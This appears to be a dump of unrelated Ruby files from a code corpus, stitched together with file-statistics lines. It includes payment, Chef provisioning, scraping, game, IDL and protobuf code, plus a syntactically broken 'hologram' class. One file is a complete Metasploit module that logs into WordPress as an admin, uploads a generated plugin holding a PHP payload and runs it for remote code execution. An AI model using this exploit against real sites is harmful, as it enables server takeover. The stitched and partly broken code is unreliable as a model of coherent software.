s.add_dependency(%q<rainbow>.freeze, ["~> 2.1.0"])
s.add_dependency(%q<pry>.freeze, ["~> 0.10"])
s.add_dependency(%q<jekyll_test_plugin_malicious>.freeze, ["~> 0.2"])
s.add_dependency(%q<rubocop>.freeze, ["~> 0.4"])
end
end
| 57.951613 | 112 | 0.659059 |
1a445c8eda435a1e7fb371d35bf5d9008ecd6013 | 747 | require_relative "service"
module Adyen
class Payments < Service
attr_accessor :version
DEFAULT_VERSION = 64
def initialize(client, version = DEFAULT_VERSION)
service = "Payment"
method_names = [
:authorise,
:authorise3d,
:authorise3ds2,
:capture,
:cancel,
:refund,
:cancel_or_refund,
:adjust_authorisation,
:donate,
:get_authentication_result,
:technical_cancel,
:void_pending_refund,
:retrieve_3ds2_result
]
with_application_info = [
:authorise,
:authorise3d,
:authorise3ds2
]
super(client, version, service, method_names, with_application_info)
end
end
end
| 21.342857 | 74 | 0.606426 |
1aea59cf2fe26b16b9d63c1873796346b949f195 | 289 | ## Adds Star Wars like holograms to site.
Class hologram
:attr_accessor :type, :gender
def initialize(type, gender)
@type = type
@gender = gender
end
def render_image(img)
live_image(img)
end
end | 13.761905 | 41 | 0.519031 |
7a96058789250b51e47bad543ff3cc0b67882bb6 | 6,684 | # Cookbook Name:: cerebro
include_recipe 'java::default' # Note this must exist for elasticsearch
# set vars
install_dir = node['cerebro']['install_dir']
fqdn_hostname = node['cerebro']['fqdn_hostname']
short_hostname = node['cerebro']['short_hostname']
machinename = node['cerebro']['machinename']
app_port = node['cerebro']['app_port']
app_name = node['cerebro']['app_name']
app_user = node['cerebro']['app_user']
app_group = node['cerebro']['app_group']
app_bin_path = node['cerebro']['app_bin_path']
app_workdir = node['cerebro']['app_workdir']
dist_url = node['cerebro']['dist_url']
dist_package = node['cerebro']['dist_package']
dist_checksum = node['cerebro']['dist_checksum']
app_version = node['cerebro']['app_version']
config_dir = node['cerebro']['config_dir']
app_systemd_desc = node['cerebro']['app_systemd_desc']
standard_output = node['cerebro']['standard_output']
standard_error = node['cerebro']['standard_error']
timeout_stop_sec = node['cerebro']['timeout_stop_sec']
kill_signal = node['cerebro']['kill_signal']
send_sig_kill = node['cerebro']['send_sig_kill']
success_exit_status = node['cerebro']['success_exit_status']
app_secret_key = node['cerebro']['app_secret_key']
truststore_file = node['cerebro']['truststore_file']
truststore_path = node['cerebro']['truststore_path']
s3_bucket_remote_path = node['td_elasticsearch']['s3_bucket_remote_path']
# databag 'sigh' needed for kitchen and non chef provisioned (with role, etc.) this is just RO chef user
aws = data_bag_item('aws', 'main')
aws_access_key = aws['aws_access_key_id']
aws_secret_access_key = aws['aws_secret_access_key']
Chef::Log.info("for non-EC2 instances we will use RO chef users aws_access_key: #{aws_access_key} and its aws_secret_access_key")
Chef::Log.info("DEBUG fqdn_hostname: #{fqdn_hostname}")
package %w(httpd mod_ssl)
template '/etc/httpd/conf.d/cerebro-service.conf' do
source 'cerebro.httpd.conf.erb'
notifies :restart, 'service[httpd]', :delayed
variables({
:fqdn_hostname => fqdn_hostname,
:short_hostname => short_hostname,
:machinename => machinename,
:app_port => app_port,
})
end
# shouldnt need this using RPM install JIC for reference JIC
# template '/etc/httpd/conf.modules.d/00-proxy.conf' do
# source '00-proxy.conf.erb'
# notifies :restart, 'service[httpd]', :delayed
# end
service 'httpd' do
action [ :enable, :start ]
subscribes :reload, 'template[/etc/httpd/conf.d/cerebro-service.conf]', :immediately
#subscribes :reload, 'template[/etc/httpd/conf.modules.d/00-proxy.conf]', :immediately
reload_command 'systemctl daemon-reload'
end
# fetch cerebro app dist
# i.e.: https://github.com/lmenezes/cerebro/releases/download/v0.7.2/cerebro-0.7.2.tgz
remote_file "/var/tmp/#{dist_package}" do
source dist_url
checksum dist_checksum
mode "0755"
action :create
end
directory install_dir do
owner app_user
group app_group
mode '0755'
action :create
end
execute 'extract tar.gz file' do
command "tar xzvf /var/tmp/#{dist_package}"
cwd install_dir
not_if { File.exists?("#{config_dir}/application.conf") }
end
# chef why write these backwards?
# linux command ln $target $source
# ln -s cerebro-0.7.2 current
link "#{install_dir}/current" do
to "#{install_dir}/#{app_name}-#{app_version}"
end
# find /opt/cerebro -type d
# /opt/cerebro
# /opt/cerebro/cerebro-0.7.2
# /opt/cerebro/cerebro-0.7.2/bin
# /opt/cerebro/cerebro-0.7.2/conf
# /opt/cerebro/cerebro-0.7.2/conf/evolutions
# /opt/cerebro/cerebro-0.7.2/conf/evolutions/default
# /opt/cerebro/cerebro-0.7.2/lib
# /opt/cerebro/cerebro-0.7.2/logs
# works but not recursively
# ref: https://github.com/chef/chef/issues/4468
#
# directory "#{install_dir}" do
# #%w[ /foo /foo/bar /foo/bar/baz ].each do |path| # hmm lots here
# #%w[ ].each do |path| # icky
# command lazy {
# "#{dir_list}".each do |path|
# owner "#{app_user}"
# group "#{app_group}"
# recursive true
# end
# }
# end
#
# sadly this is not idempotent the alternative is having to list every sub dir in the tree as noted above
# punting and sadly can live with this for now.
execute "chown-data-#{install_dir}" do
command "chown -R #{app_user}:#{app_group} #{install_dir}"
action :run
only_if "find #{install_dir} \! -user #{app_user}"
end
aws_s3_file "#{truststore_path}/#{truststore_file}" do
aws_access_key "#{aws_access_key}"
aws_secret_access_key "#{aws_secret_access_key}"
bucket 'terradatum-chef'
region 'us-west-1'
action :create
remote_path "#{s3_bucket_remote_path}/#{truststore_file}"
owner "#{app_user}"
group "#{app_group}"
end
# Configure Systemd for cerebro
template "/etc/systemd/system/#{app_name}.service" do
source 'cerebro.service.erb'
#notifies :restart, "systemd_unit[#{app_name}.service]", :delayed
notifies :restart, "service[#{app_name}]", :delayed
variables({
:app_systemd_desc => app_systemd_desc,
:fqdn_hostname => fqdn_hostname,
:app_port => app_port,
:app_workdir => app_workdir,
:app_user => app_user,
:app_group => app_group,
:app_bin_path => app_bin_path,
:standard_output => standard_output,
:standard_error => standard_error,
:timeout_stop_sec => timeout_stop_sec,
:kill_signal => kill_signal,
:send_sig_kill => send_sig_kill,
:success_exit_status => success_exit_status
})
end
# if we need to we can mod app logging here
# template "#{config_dir}/logger.xml" do
# source "logger.xml.erb"
# variables({
# })
# end
# Create the application.conf file
template "#{config_dir}/application.conf" do
source 'cerebro.application.conf.erb'
owner "#{app_user}"
group "#{app_group}"
mode '0744'
#notifies :restart, "systemd_unit[#{app_name}.service]", :delayed
notifies :restart, "service[#{app_name}]", :immediately
variables({
:app_secret_key => app_secret_key
})
end
# as apache user req for term TLS/SSL and proxying for the play app--i.e., for cerebro we are sporting:
# java -Duser.dir=/opt/cerebro/cerebro-0.7.2 -Dhttp.port=9000 -Dhttp.address=kibana1.terradatum.com -cp -jar /opt/cerebro/cerebro-0.7.2/lib/cerebro.cerebro-0.7.2-launcher.jar
service "#{app_name}" do
supports :status => true, :restart => true
action [ :enable, :start ]
#subscribes :restart, "#{config_dir}/application.conf", :immediately
reload_command 'systemctl daemon-reload'
end
| 35.365079 | 175 | 0.681329 |
e27476c2b6a02dcd2501e59e376539a8fb278de8 | 106 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'easy_rss'
require 'minitest/autorun'
| 21.2 | 58 | 0.745283 |
181f7bb1e8681c4b31c43fd4e44dec8d4e9fab4c | 2,428 | require 'java'
java_import 'org.apollo.game.model.Animation'
java_import 'org.apollo.game.model.Graphic'
java_import 'org.apollo.game.model.entity.Skill'
ALCHEMY_SPELLS = {}
ILLEGAL_ALCH_ITEMS = [995, 6529, 6306, 6307, 6308, 6309, 6310]
# A spell that alchemises an item.
class AlchemySpell < Spell
attr_reader :animation, :graphic, :multiplier, :experience
def initialize(level, elements, experience, animation, graphic, multiplier)
super(level, elements, experience)
@animation = animation
@graphic = graphic
@multiplier = multiplier
end
end
# An Action that performs an AlchemySpell.
class AlchemyAction < ItemSpellAction
def initialize(player, alchemy, slot, item)
super(player, alchemy, slot, item)
end
def illegal_item?
ILLEGAL_ALCH_ITEMS.include?(@item.id)
end
def executeAction
if @pulses == 0
mob.play_animation(@spell.animation)
mob.play_graphic(@spell.graphic)
mob.send(DISPLAY_SPELLBOOK)
inventory = mob.inventory
gold = (item.definition.value * @spell.multiplier) + 1
inventory.remove(inventory.get(@slot).id, 1)
inventory.add(995, gold)
mob.skill_set.add_experience(Skill::MAGIC, @spell.experience)
set_delay(ALCHEMY_DELAY)
elsif @pulses == 1
mob.stop_animation
mob.stop_graphic
stop
end
end
end
private
# The delay of an alchemy spell.
ALCHEMY_DELAY = 4
# The height of the graphic.
GRAPHIC_HEIGHT = 100
# Inserts an `AlchemySpell` into the hash of available alchemy spells.
def alchemy(_name, hash)
unless hash.has_keys?(:button, :level, :runes, :animation, :graphic, :multiplier, :experience)
fail 'Hash must have button, level, runes, animation, graphic, multiplier, experience keys.'
end
id, multiplier = hash[:button], hash[:multiplier]
level, runes, experience = hash[:level], hash[:runes], hash[:experience]
animation = Animation.new(hash[:animation])
graphic = Graphic.new(hash[:graphic], 0, GRAPHIC_HEIGHT)
ALCHEMY_SPELLS[id] = AlchemySpell.new(level, runes, experience, animation, graphic, multiplier)
end
alchemy :low_level, button: 1_162, level: 21, runes: { FIRE => 3, NATURE => 1 }, animation: 712,
graphic: 112, multiplier: 0.48, experience: 31
alchemy :high_level, button: 1_178, level: 55, runes: { FIRE => 5, NATURE => 1 }, animation: 713,
graphic: 113, multiplier: 0.72, experience: 65
| 28.232558 | 97 | 0.700577 |
08fb92fe4228e058363a77602216af0b673896ef | 3,941 | require 'top_secret/version'
require 'rest-client'
require 'nokogiri'
require 'date'
require 'pry'
module TopSecret
class Scrape
def self.positive(url, pages, limit_to_return)
reviews = []
counter = 1
# replaces url and calls extract on correct number of pages starting with the first page.
while counter <= pages
url = url.sub('page' + (counter - 1).to_s, 'page' + counter.to_s)
reviews.concat extract(url)
counter += 1
end
# sorts reviews based on teh overall score and then the date.
sort(reviews, limit_to_return)
end
def self.sort(reviews, limit_to_return)
reviews = reviews.sort { |a, b| [b['overall'], Date.parse(b['date'])] <=> [a['overall'], Date.parse(a['date'])] }
reviews.first(limit_to_return)
end
def self.extract(url)
reviews = []
# convert the rest-client object object into a nokogiri object to be parsed. The review-wrapper css class is used to identify reviews.
noko_page = Nokogiri::HTML(RestClient.get(url)).css('.review-entry')
# map through each user_review
noko_page.map do |user_review|
review_to_add = {}
# the date and overall are located in an earlier div than the rest of the info locates in the review-wrapper container
add_date_overall(user_review, review_to_add)
# the rest of the review
review_wrapper = user_review.css('.review-wrapper').css('div')
# title and name
add_title_name(review_wrapper, review_to_add)
# the main text of the review
add_main_text(review_wrapper, review_to_add)
# map through specific review score and call rating to fetch correct score.
add_specific_ratings(review_wrapper, review_to_add)
# add employees
add_employees(review_wrapper, review_to_add)
reviews.push(review_to_add)
end
# return reviews
reviews
end
def self.add_date_overall(user_review, review_to_add)
date_and_overall = user_review.css('.review-date').css('div')
review_to_add['date'] = date_and_overall.css('.italic').text.strip
review_to_add['overall'] = rating(date_and_overall.css('.dealership-rating').css('div')[1])
end
def self.add_title_name(review_wrapper, review_to_add)
review_title = review_wrapper[1]
review_to_add['title'] = review_title.css('h3').text.strip
review_to_add['name'] = review_title.css('span').text.strip
end
def self.add_main_text(review_wrapper, review_to_add)
review_body = review_wrapper[2]
review_to_add['body'] = review_body.css('p').text.strip
end
def self.add_specific_ratings(review_wrapper, review_to_add)
# the specific ratings
review_ratings = review_wrapper.css('.review-ratings-all').css('.table').css('.tr')
review_ratings.map do |specific_rating|
specific_score = rating(specific_rating.css('div')[1])
review_to_add[specific_rating.css('.bold').text] = specific_score
end
end
def self.add_employees(review_wrapper, review_to_add)
# component containing employees
review_employees = review_wrapper.css('.employees-wrapper')
employees = []
# loops through and stores each employee name
review_employees.css('a').map do |employee|
employees.push(employee.text.strip)
end
review_to_add['employees'] = employees
# adds other employees if they exist
if (other_employees = review_employees.css('span').css('.italic').text.strip) && !other_employees.empty?
review_to_add['other_employees'] = other_employees
end
review_to_add
end
# returns correct rating based on class and text of elemnt passed in.
def self.rating(element)
return element.text.strip unless element.text.empty?
rating_re = /\d+/
rating_re.match(element.attr('class'))[0]
end
end
end
| 33.398305 | 140 | 0.676224 |
bb87cb5dd499e5620e04b13b5f8742396e816bd6 | 1,335 | =begin
#Ory APIs
#Documentation for all public and administrative Ory APIs. Administrative APIs can only be accessed with a valid Personal Access Token. Public APIs are mostly used in browsers.
The version of the OpenAPI document: v0.0.1-alpha.93
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.4.0
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for OryClient::SubmitSelfServiceRegistrationFlowBody
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe OryClient::SubmitSelfServiceRegistrationFlowBody do
describe '.openapi_one_of' do
it 'lists the items referenced in the oneOf array' do
expect(described_class.openapi_one_of).to_not be_empty
end
end
describe '.openapi_discriminator_name' do
it 'returns the value of the "discriminator" property' do
expect(described_class.openapi_discriminator_name).to_not be_empty
end
end
describe '.openapi_discriminator_mapping' do
it 'returns the key/values of the "mapping" property' do
expect(described_class.openapi_discriminator_mapping.values.sort).to eq(described_class.openapi_one_of.sort)
end
end
describe '.build' do
it 'returns the correct model' do
end
end
end
| 30.340909 | 177 | 0.776779 |
7af6d3a977dc11ba163398ad8328b0854dcf162f | 5,561 | #--------------------------------------------------------------------
# @file localexecutormapping.rb
# @author Johnny Willemsen
#
# @brief walker class for local executor mapping support
#
# @copyright Copyright (c) Remedy IT Expertise BV
#--------------------------------------------------------------------
require 'ridlbe/c++11/writerbase'
require 'ridlbe/c++11/writers/helpers/include_guard_helper'
module IDL
module CCMX11
class LemExecutorIDLWriterBase < Cxx11::CxxCodeWriterBase
def initialize(output = STDOUT, opts = {})
super
self.template_root = 'lem_idl'
self.disable_scope_tracking = false
end
attr_accessor :include_guard
end
class LemComponentScanner < Cxx11::CxxCodeWriterBase
attr_accessor :has_component, :has_connector
def initialize(output = STDOUT, opts = {})
super
self.disable_scope_tracking = true
end
def enter_component(node)
@has_component ||= true
detect_lem_includes(node)
end
def enter_connector(node)
@has_connector ||= true
detect_lem_includes(node)
end
def visit_include(node)
node.all_lem_includes.each do |lem_inc|
add_lem_include(lem_inc)
end
end
def lem_includes
@lem_includes ||= []
end
private
def add_lem_include(lem_inc)
# add LEM include; prevent duplicates
lem_includes << lem_inc unless lem_includes.include?(lem_inc)
end
def detect_lem_includes(comp)
# When the component is derived from another we need to
# find the lem stub where the base component is defined in
if comp.base
detect_included_interface(comp.base)
end
comp.ports.each do |port|
# For an interface used as facet we need to
# included the interface LEM include, for a
# receptacle the IDL file defining the interface
# is already included in the component/connector IDL
if port.porttype == :facet
# see if interface declared in include file
# get port interface node
intf = port.idltype.resolved_type.node
detect_included_interface(intf)
end
end
end
def detect_included_interface(node)
# see if interface node is leaf of Include node
while node.enclosure
if IDL::AST::Include === node.enclosure
# included interface needs LEM include
add_lem_include(node.enclosure.filename.sub(/\.idl\Z/i, 'E.idl'))
break
end
node = node.enclosure
end
end
end
class LemExecutorIDLWriter < LemExecutorIDLWriterBase
helper_method :has_component?, :has_connector?, :has_lem_includes?, :lem_includes
helper Cxx11::IncludeGuardHelper
def initialize(output = STDOUT, opts = {})
super
@include_guard = "__RIDL_#{File.basename(params[:lem_output_file] || '').to_random_include_guard}_INCLUDED__"
if params[:stripped_filename] != nil
properties[:org_idl_include] = params[:stripped_filename]
else
properties[:org_idl_include] = File.basename(params[:idlfile], params[:idlext]) + params[:idlext]
end
end
def has_component?
@has_component || @has_connector
end
def has_connector?
@has_connector
end
def lem_includes
@lem_includes ||= []
end
def has_lem_includes?
!lem_includes.empty?
end
def pre_visit(parser)
writer(LemComponentScanner) do |w|
w.visit_nodes(parser)
@has_component = w.has_component ? true : false
@has_connector = w.has_connector ? true : false
@lem_includes = w.lem_includes
end
visitor(PreVisitor).visit
end
def post_visit(parser)
visitor(PostVisitor).visit
end
def enter_interface(node)
return if node.is_abstract?
annot = node.annotations[:"lem"]
return if annot[0] != nil && annot[0].fields[:value] != nil && annot[0].fields[:value] == false
visitor(InterfaceVisitor).visit_lem(node)
end
def enter_component(node)
visitor(ComponentVisitor).visit_lem(node)
end
def enter_connector(node)
visitor(ConnectorVisitor).visit_lem(node)
end
def module_needs_lem_code?(modnode)
modnode.match_members do |c|
if IDL::AST::Interface === c || IDL::AST::ComponentBase === c || IDL::AST::Home === c
true
elsif IDL::AST::Module === c
module_needs_lem_code?(c)
else
false
end
end
end
def enter_module(node)
super
if module_needs_lem_code?(node)
println
printiln('// generated from LemExecutorIDLWriter#enter_module')
printiln('module ' + node.unescaped_name)
printiln('{')
inc_nest
end
end
def leave_module(node)
if module_needs_lem_code?(node)
dec_nest
println
printiln("}; // module #{node.unescaped_name}")
super
end
end
end # LemExecutorIDLWriter
module LemExecutor
IDLWriter = LemExecutorIDLWriter
def self.set_idl_writer(klass)
remove_const(:IDLWriter) if const_defined?(:IDLWriter)
const_set(:IDLWriter, klass)
end
end
end # CCMX11
end # module IDL
| 27.805 | 117 | 0.598993 |
bfd462099b0bc9f2ee924f527ec42162737d26f5 | 450 | module HolidaysFromGoogleCalendar
class Configuration
DEFAULT_CACHE_SIZE = 1_000
attr_accessor :calendar, :credential, :cache, :preload
def initialize
@calendar = {
nation: "japanese",
language: "en"
}
@cache = {
enable: true,
max_size: DEFAULT_CACHE_SIZE
}
@preload = {
enable: true, # Require cache enabled
date_range: 1.year
}
end
end
end
| 18 | 58 | 0.582222 |
1ab30f176fec5283c0d946aa280756deaf5af79a | 3,058 | ##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HTTP::Wordpress
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress Admin Shell Upload',
'Description' => %q{
This module will generate a plugin, pack the payload into it
and upload it to a server running WordPress providing valid
admin credentials are used.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Rob Carr <rob[at]rastating.com>' # Metasploit module
],
'DisclosureDate' => 'Feb 21 2015',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['WordPress', {}]],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
], self.class)
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def generate_plugin(plugin_name, payload_name)
plugin_script = %Q{<?php
/**
* Plugin Name: #{plugin_name}
* Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}
* Author: #{Rex::Text.rand_text_alpha(10)}
* Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com
* License: GPL2
*/
?>}
zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded)
zip
end
def exploit
fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
print_status("Authenticating with WordPress using #{username}:#{password}...")
cookie = wordpress_login(username, password)
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
print_good("Authenticated with WordPress")
print_status("Preparing payload...")
plugin_name = Rex::Text.rand_text_alpha(10)
payload_name = "#{Rex::Text.rand_text_alpha(10)}"
payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
zip = generate_plugin(plugin_name, payload_name)
print_status("Uploading payload...")
uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie)
fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
print_status("Executing the payload at #{payload_uri}...")
register_files_for_cleanup("#{payload_name}.php")
register_files_for_cleanup("#{plugin_name}.php")
send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
end
end
| 33.23913 | 113 | 0.660889 |
1879b868be1d402d612883e1e4673f1389d6aa96 | 10,029 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/vision/v1/image_annotator.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
require 'google/cloud/vision/v1/geometry_pb'
require 'google/rpc/status_pb'
require 'google/type/color_pb'
require 'google/type/latlng_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_message "google.cloud.vision.v1.Feature" do
optional :type, :enum, 1, "google.cloud.vision.v1.Feature.Type"
optional :max_results, :int32, 2
end
add_enum "google.cloud.vision.v1.Feature.Type" do
value :TYPE_UNSPECIFIED, 0
value :FACE_DETECTION, 1
value :LANDMARK_DETECTION, 2
value :LOGO_DETECTION, 3
value :LABEL_DETECTION, 4
value :TEXT_DETECTION, 5
value :SAFE_SEARCH_DETECTION, 6
value :IMAGE_PROPERTIES, 7
end
add_message "google.cloud.vision.v1.ImageSource" do
optional :gcs_image_uri, :string, 1
end
add_message "google.cloud.vision.v1.Image" do
optional :content, :bytes, 1
optional :source, :message, 2, "google.cloud.vision.v1.ImageSource"
end
add_message "google.cloud.vision.v1.FaceAnnotation" do
optional :bounding_poly, :message, 1, "google.cloud.vision.v1.BoundingPoly"
optional :fd_bounding_poly, :message, 2, "google.cloud.vision.v1.BoundingPoly"
repeated :landmarks, :message, 3, "google.cloud.vision.v1.FaceAnnotation.Landmark"
optional :roll_angle, :float, 4
optional :pan_angle, :float, 5
optional :tilt_angle, :float, 6
optional :detection_confidence, :float, 7
optional :landmarking_confidence, :float, 8
optional :joy_likelihood, :enum, 9, "google.cloud.vision.v1.Likelihood"
optional :sorrow_likelihood, :enum, 10, "google.cloud.vision.v1.Likelihood"
optional :anger_likelihood, :enum, 11, "google.cloud.vision.v1.Likelihood"
optional :surprise_likelihood, :enum, 12, "google.cloud.vision.v1.Likelihood"
optional :under_exposed_likelihood, :enum, 13, "google.cloud.vision.v1.Likelihood"
optional :blurred_likelihood, :enum, 14, "google.cloud.vision.v1.Likelihood"
optional :headwear_likelihood, :enum, 15, "google.cloud.vision.v1.Likelihood"
end
add_message "google.cloud.vision.v1.FaceAnnotation.Landmark" do
optional :type, :enum, 3, "google.cloud.vision.v1.FaceAnnotation.Landmark.Type"
optional :position, :message, 4, "google.cloud.vision.v1.Position"
end
add_enum "google.cloud.vision.v1.FaceAnnotation.Landmark.Type" do
value :UNKNOWN_LANDMARK, 0
value :LEFT_EYE, 1
value :RIGHT_EYE, 2
value :LEFT_OF_LEFT_EYEBROW, 3
value :RIGHT_OF_LEFT_EYEBROW, 4
value :LEFT_OF_RIGHT_EYEBROW, 5
value :RIGHT_OF_RIGHT_EYEBROW, 6
value :MIDPOINT_BETWEEN_EYES, 7
value :NOSE_TIP, 8
value :UPPER_LIP, 9
value :LOWER_LIP, 10
value :MOUTH_LEFT, 11
value :MOUTH_RIGHT, 12
value :MOUTH_CENTER, 13
value :NOSE_BOTTOM_RIGHT, 14
value :NOSE_BOTTOM_LEFT, 15
value :NOSE_BOTTOM_CENTER, 16
value :LEFT_EYE_TOP_BOUNDARY, 17
value :LEFT_EYE_RIGHT_CORNER, 18
value :LEFT_EYE_BOTTOM_BOUNDARY, 19
value :LEFT_EYE_LEFT_CORNER, 20
value :RIGHT_EYE_TOP_BOUNDARY, 21
value :RIGHT_EYE_RIGHT_CORNER, 22
value :RIGHT_EYE_BOTTOM_BOUNDARY, 23
value :RIGHT_EYE_LEFT_CORNER, 24
value :LEFT_EYEBROW_UPPER_MIDPOINT, 25
value :RIGHT_EYEBROW_UPPER_MIDPOINT, 26
value :LEFT_EAR_TRAGION, 27
value :RIGHT_EAR_TRAGION, 28
value :LEFT_EYE_PUPIL, 29
value :RIGHT_EYE_PUPIL, 30
value :FOREHEAD_GLABELLA, 31
value :CHIN_GNATHION, 32
value :CHIN_LEFT_GONION, 33
value :CHIN_RIGHT_GONION, 34
end
add_message "google.cloud.vision.v1.LocationInfo" do
optional :lat_lng, :message, 1, "google.type.LatLng"
end
add_message "google.cloud.vision.v1.Property" do
optional :name, :string, 1
optional :value, :string, 2
end
add_message "google.cloud.vision.v1.EntityAnnotation" do
optional :mid, :string, 1
optional :locale, :string, 2
optional :description, :string, 3
optional :score, :float, 4
optional :confidence, :float, 5
optional :topicality, :float, 6
optional :bounding_poly, :message, 7, "google.cloud.vision.v1.BoundingPoly"
repeated :locations, :message, 8, "google.cloud.vision.v1.LocationInfo"
repeated :properties, :message, 9, "google.cloud.vision.v1.Property"
end
add_message "google.cloud.vision.v1.SafeSearchAnnotation" do
optional :adult, :enum, 1, "google.cloud.vision.v1.Likelihood"
optional :spoof, :enum, 2, "google.cloud.vision.v1.Likelihood"
optional :medical, :enum, 3, "google.cloud.vision.v1.Likelihood"
optional :violence, :enum, 4, "google.cloud.vision.v1.Likelihood"
end
add_message "google.cloud.vision.v1.LatLongRect" do
optional :min_lat_lng, :message, 1, "google.type.LatLng"
optional :max_lat_lng, :message, 2, "google.type.LatLng"
end
add_message "google.cloud.vision.v1.ColorInfo" do
optional :color, :message, 1, "google.type.Color"
optional :score, :float, 2
optional :pixel_fraction, :float, 3
end
add_message "google.cloud.vision.v1.DominantColorsAnnotation" do
repeated :colors, :message, 1, "google.cloud.vision.v1.ColorInfo"
end
add_message "google.cloud.vision.v1.ImageProperties" do
optional :dominant_colors, :message, 1, "google.cloud.vision.v1.DominantColorsAnnotation"
end
add_message "google.cloud.vision.v1.ImageContext" do
optional :lat_long_rect, :message, 1, "google.cloud.vision.v1.LatLongRect"
repeated :language_hints, :string, 2
end
add_message "google.cloud.vision.v1.AnnotateImageRequest" do
optional :image, :message, 1, "google.cloud.vision.v1.Image"
repeated :features, :message, 2, "google.cloud.vision.v1.Feature"
optional :image_context, :message, 3, "google.cloud.vision.v1.ImageContext"
end
add_message "google.cloud.vision.v1.AnnotateImageResponse" do
repeated :face_annotations, :message, 1, "google.cloud.vision.v1.FaceAnnotation"
repeated :landmark_annotations, :message, 2, "google.cloud.vision.v1.EntityAnnotation"
repeated :logo_annotations, :message, 3, "google.cloud.vision.v1.EntityAnnotation"
repeated :label_annotations, :message, 4, "google.cloud.vision.v1.EntityAnnotation"
repeated :text_annotations, :message, 5, "google.cloud.vision.v1.EntityAnnotation"
optional :safe_search_annotation, :message, 6, "google.cloud.vision.v1.SafeSearchAnnotation"
optional :image_properties_annotation, :message, 8, "google.cloud.vision.v1.ImageProperties"
optional :error, :message, 9, "google.rpc.Status"
end
add_message "google.cloud.vision.v1.BatchAnnotateImagesRequest" do
repeated :requests, :message, 1, "google.cloud.vision.v1.AnnotateImageRequest"
end
add_message "google.cloud.vision.v1.BatchAnnotateImagesResponse" do
repeated :responses, :message, 1, "google.cloud.vision.v1.AnnotateImageResponse"
end
add_enum "google.cloud.vision.v1.Likelihood" do
value :UNKNOWN, 0
value :VERY_UNLIKELY, 1
value :UNLIKELY, 2
value :POSSIBLE, 3
value :LIKELY, 4
value :VERY_LIKELY, 5
end
end
module Google
module Cloud
module Vision
module V1
Feature = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.Feature").msgclass
Feature::Type = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.Feature.Type").enummodule
ImageSource = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.ImageSource").msgclass
Image = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.Image").msgclass
FaceAnnotation = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.FaceAnnotation").msgclass
FaceAnnotation::Landmark = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.FaceAnnotation.Landmark").msgclass
FaceAnnotation::Landmark::Type = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.FaceAnnotation.Landmark.Type").enummodule
LocationInfo = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.LocationInfo").msgclass
Property = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.Property").msgclass
EntityAnnotation = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.EntityAnnotation").msgclass
SafeSearchAnnotation = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.SafeSearchAnnotation").msgclass
LatLongRect = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.LatLongRect").msgclass
ColorInfo = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.ColorInfo").msgclass
DominantColorsAnnotation = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.DominantColorsAnnotation").msgclass
ImageProperties = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.ImageProperties").msgclass
ImageContext = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.ImageContext").msgclass
AnnotateImageRequest = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.AnnotateImageRequest").msgclass
AnnotateImageResponse = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.AnnotateImageResponse").msgclass
BatchAnnotateImagesRequest = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.BatchAnnotateImagesRequest").msgclass
BatchAnnotateImagesResponse = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.BatchAnnotateImagesResponse").msgclass
Likelihood = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.Likelihood").enummodule
end
end
end
end
